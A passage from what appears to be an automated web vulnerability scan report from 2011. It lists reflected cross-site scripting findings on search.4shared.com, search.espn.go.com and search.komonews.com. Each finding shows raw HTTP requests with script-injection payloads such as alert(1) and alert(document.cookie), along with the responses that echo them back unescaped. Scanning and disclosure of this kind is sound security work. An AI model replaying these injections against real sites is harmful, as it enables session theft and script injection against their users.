Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/mainWithoutCommon.css63f80&quot;-alert(1)-&quot;11bae875e74
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:03:50 GMT
Content-Length: 36310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css/mainWithoutCommon.css63f80"-alert(1)-"11bae875e74";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.316. http://search.4shared.com/js/utils.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /js/utils.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36042"-alert(1)-"1c581c8364b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js36042"-alert(1)-"1c581c8364b/utils.js HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /js36042&quot;-alert(1)-&quot;1c581c8364b/utils.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:04:09 GMT
Content-Length: 36240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/js36042"-alert(1)-"1c581c8364b/utils.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.317. http://search.4shared.com/js/utils.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /js/utils.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0040"-alert(1)-"c8a96e2acb2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/utils.jsf0040"-alert(1)-"c8a96e2acb2 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /js/utils.jsf0040&quot;-alert(1)-&quot;c8a96e2acb2
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:07:06 GMT
Content-Length: 36251


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/js/utils.jsf0040"-alert(1)-"c8a96e2acb2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.318. http://search.4shared.com/search.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /search.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ef9a6--><script>alert(1)</script>310e4e7016 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.html?ef9a6--><script>alert(1)</script>310e4e7016=1 HTTP/1.1
Host: search.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: hostid=1214903107; Expires=Sat, 20-Feb-2021 23:05:47 GMT; Path=/
Set-Cookie: search.view2=ls; Domain=.4shared.com; Expires=Thu, 23-Feb-2012 23:05:47 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:05:47 GMT
Connection: close
Content-Length: 97304


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>
...[SNIP]...
<!-- params: {searchName=, ef9a6--><script>alert(1)</script>310e4e7016=1, start=0} -->
...[SNIP]...

3.319. http://search.espn.go.com/s/ie8/suggestions [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.espn.go.com
Path:   /s/ie8/suggestions

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 337fb<script>alert(1)</script>c9bcf2da6ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/ie8337fb<script>alert(1)</script>c9bcf2da6ef/suggestions?q={searchTerms} HTTP/1.1
Host: search.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 139
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/s/ie8337fb<script>alert(1)</script>c9bcf2da6ef/suggestions</BODY></HTML>

3.320. http://search.espn.go.com/s/ie8/suggestions [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.espn.go.com
Path:   /s/ie8/suggestions

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5dae3<script>alert(1)</script>2ed2625dccf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/ie8/suggestions5dae3<script>alert(1)</script>2ed2625dccf?q={searchTerms} HTTP/1.1
Host: search.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 139
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/s/ie8/suggestions5dae3<script>alert(1)</script>2ed2625dccf</BODY></HTML>

3.321. http://search.komonews.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 828f5"><script>alert(1)</script>39ab8bcd49a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?828f5"><script>alert(1)</script>39ab8bcd49a=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&828f5%22%3e%3cscript%3ealert(1)%3c%2fscript%3e39ab8bcd49a=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 59417
Set-Cookie: .ASPXANONYMOUS=CMDHFEAKzAEkAAAAY2U0MzNhZmYtZGUxZi00YTI5LWFlNzQtYzcyYjQzY2M2MWFiZBs8uVr2lxQ8LA9daCyY3ENgMo01; expires=Wed, 04-May-2011 09:46:02 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:02 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:02 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:02 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:02 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:02 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>KOMO News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   <m
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&828f5"><script>alert(1)</script>39ab8bcd49a=1&ename=rsspage" />
...[SNIP]...

3.322. http://search.komonews.com/Boeing [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Boeing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5871d"><script>alert(1)</script>471bc5d854b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Boeing?5871d"><script>alert(1)</script>471bc5d854b=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&type=20245,90000063&5871d%22%3e%3cscript%3ealert(1)%3c%2fscript%3e471bc5d854b=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48506
Set-Cookie: .ASPXANONYMOUS=v2zMF0AKzAEkAAAAMjBjMTQyZTUtOTMxNi00NmI4LWIwMzUtMTM3OTI0Zjc1NTE3qQuSrY5MTFyMezLzfacF0LvtraM1; expires=Wed, 04-May-2011 09:46:08 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:08 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Boeing News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&type=20245,90000063&5871d"><script>alert(1)</script>471bc5d854b=1&ename=rsspage" />
...[SNIP]...

3.323. http://search.komonews.com/Microsoft [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Microsoft

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1976"><script>alert(1)</script>295fe6a9b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Microsoft?f1976"><script>alert(1)</script>295fe6a9b13=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&type=20245,89000029&f1976%22%3e%3cscript%3ealert(1)%3c%2fscript%3e295fe6a9b13=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44873
Set-Cookie: .ASPXANONYMOUS=K5LHF0AKzAEkAAAAMDRjNTEwMDMtNzA3YS00NTcwLWJkYmMtZjlkYmZlMjBlYWUx3Uqln6MJkSOnnnoDhvzfEXifdtQ1; expires=Wed, 04-May-2011 09:46:08 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:08 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Microsoft News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" /
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&type=20245,89000029&f1976"><script>alert(1)</script>295fe6a9b13=1&ename=rsspage" />
...[SNIP]...

3.324. http://search.komonews.com/National-Leaders/Barack-Obama [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /National-Leaders/Barack-Obama

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afb1f"><script>alert(1)</script>56cfaf9390e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /National-Leaders/Barack-Obama?afb1f"><script>alert(1)</script>56cfaf9390e=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&type=20230,50001140&afb1f%22%3e%3cscript%3ealert(1)%3c%2fscript%3e56cfaf9390e=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53639
Set-Cookie: .ASPXANONYMOUS=96RrJkAKzAEkAAAAODVlY2RkYTgtM2Y5Mi00MmNjLThiYzEtZDY1NzQzYTk4ODg0CqP5RJJL7rmcVYFM8LPTMuEZ88A1; expires=Wed, 04-May-2011 09:46:32 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:32 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:32 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:32 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:32 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:32 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Barack Obama News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&type=20230,50001140&afb1f"><script>alert(1)</script>56cfaf9390e=1&ename=rsspage" />
...[SNIP]...

3.325. http://search.komonews.com/Sports/Mariners [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Sports/Mariners

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd653"><script>alert(1)</script>52ad56ec133 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Sports/Mariners?bd653"><script>alert(1)</script>52ad56ec133=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=&=quot%3bMariners%2cquot%3b&type=20198,20249732&bd653%22%3e%3cscript%3ealert(1)%3c%2fscript%3e52ad56ec133=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51176
Set-Cookie: .ASPXANONYMOUS=nCStKEAKzAEkAAAAMThmMTQwMzAtZDJjYS00NGU3LTgxMzMtMDRlY2JmY2MwYTFiA5OESjmJdTdf8b9aTWmeoyyk5RE1; expires=Wed, 04-May-2011 09:46:36 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:36 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:36 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:36 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:36 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:36 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Sports News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&=quot%3bMariners%2cquot%3b&type=20198,20249732&bd653"><script>alert(1)</script>52ad56ec133=1&ename=rsspage" />
...[SNIP]...

3.326. http://search.komonews.com/Sports/Seahawks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Sports/Seahawks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed940"><script>alert(1)</script>af0d5982538 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Sports/Seahawks?ed940"><script>alert(1)</script>af0d5982538=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=&=quot%3bSeahawks%2cquot%3b&type=20198,20249732&ed940%22%3e%3cscript%3ealert(1)%3c%2fscript%3eaf0d5982538=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51176
Set-Cookie: .ASPXANONYMOUS=irwmKUAKzAEkAAAAMGVhNGU4MDctYTUzOC00M2JmLTg0OGYtMTlkMWEyM2YzNzVhP97LsOtMhGepQwGK_6QVdWu3ce81; expires=Wed, 04-May-2011 09:46:37 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:37 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:37 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:37 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:37 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:37 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Sports News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&=quot%3bSeahawks%2cquot%3b&type=20198,20249732&ed940"><script>alert(1)</script>af0d5982538=1&ename=rsspage" />
...[SNIP]...

3.327. http://search.komonews.com/Sports/Sounders [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Sports/Sounders

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52dca"><script>alert(1)</script>187c0480744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Sports/Sounders?52dca"><script>alert(1)</script>187c0480744=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=%22Sounders%22&type=20198,20249732&52dca%22%3e%3cscript%3ealert(1)%3c%2fscript%3e187c0480744=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48661
Set-Cookie: .ASPXANONYMOUS=tGPDKUAKzAEkAAAANzM0Mjg0ZWEtZTJkNS00NmE1LWIyY2QtNjJiOGEyNTc1NWUwSHq9SF8emDkTTAASAqfuVEITTFM1; expires=Wed, 04-May-2011 09:46:38 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:38 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:38 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:38 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:38 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:38 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Sports &quot;Sounders&quot; News</title>
   <meta http-equiv="X-UA-Compatible
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&q=%22Sounders%22&type=20198,20249732&52dca"><script>alert(1)</script>187c0480744=1&ename=rsspage" />
...[SNIP]...

3.328. http://search.komonews.com/default.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262ed"><script>alert(1)</script>6ed48e1f7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /default.aspx?ct=r&q=alaskan+way+viaduct&262ed"><script>alert(1)</script>6ed48e1f7ef=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=alaskan+way+viaduct&262ed%22%3e%3cscript%3ealert(1)%3c%2fscript%3e6ed48e1f7ef=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47701
